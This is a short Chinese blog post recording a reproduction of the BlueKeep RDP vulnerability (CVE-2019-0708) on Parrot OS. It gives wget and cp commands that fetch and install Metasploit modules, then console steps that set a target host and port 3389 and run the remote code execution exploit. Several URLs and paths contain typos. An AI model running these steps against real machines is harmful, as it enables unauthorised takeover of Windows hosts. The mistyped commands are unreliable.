信息安全渗透测试parrot

复现CVE-2019-0708成功

2019-10-09  本文已影响0人  Enomothem

因为前段时间简书整改,所以更新较迟,下面给大家贴出我的新博客,全英文 = =
https://www.cnblogs.com/enomothem/p/11516626.html
然后是我的个人域名
https://enomothem.cn/2019/09/13/Reproduction-CVE-2019-0708/
好了,简书给大家翻译成了中文,因为在parro里操作成功的,所以建议大家去关注本人创建的parrot专题,大家一起来玩鸟啊~
细节上没能翻译过来,格式也不好看,大家可以看我英文版

Xx_介绍

Ax_准备

  1. wget https://github.com/rapid7/metasploit-framework/edb7e0221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/explot/rdp.rb
  2. wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scaner.rb
  3. wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
  4. wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
  5. cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
  6. cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
  7. cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
  8. cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auiliary/scanner/rdp/

Bx_扫描

Cx_攻击

1 use windows/rdp/cve_2019_0708_bluekeep_rce 2 set rhost xxx 3 set target xxx 4 set rport 3389 5 exploit

image image image image
上一篇下一篇

猜你喜欢

热点阅读